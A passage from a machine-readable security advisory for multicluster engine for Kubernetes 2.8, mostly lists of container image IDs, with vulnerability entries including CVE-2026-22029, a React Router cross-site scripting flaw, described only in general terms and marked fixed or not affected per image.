"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption"
},
{
"cve": "CVE-2026-22029",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2026-01-10T04:01:03.694749+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2428412"
}
],
"notes": [
{
"category": "description",
"text": "A cross site scripting flaw has been discovered in the npm react-router and @remix-run/router packages. React Router (and Remix v1/v2) SPA open navigation redirects originating from loaders or actions in Framework Mode, Data Mode, or the unstable RSC modes can result in unsafe URLs causing unintended javascript execution on the client. This is only an issue if you are creating redirect paths from untrusted content or via an open redirect.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "@remix-run/router: react-router: React Router vulnerable to XSS via Open Redirects",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le"
],
"known_not_affected": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
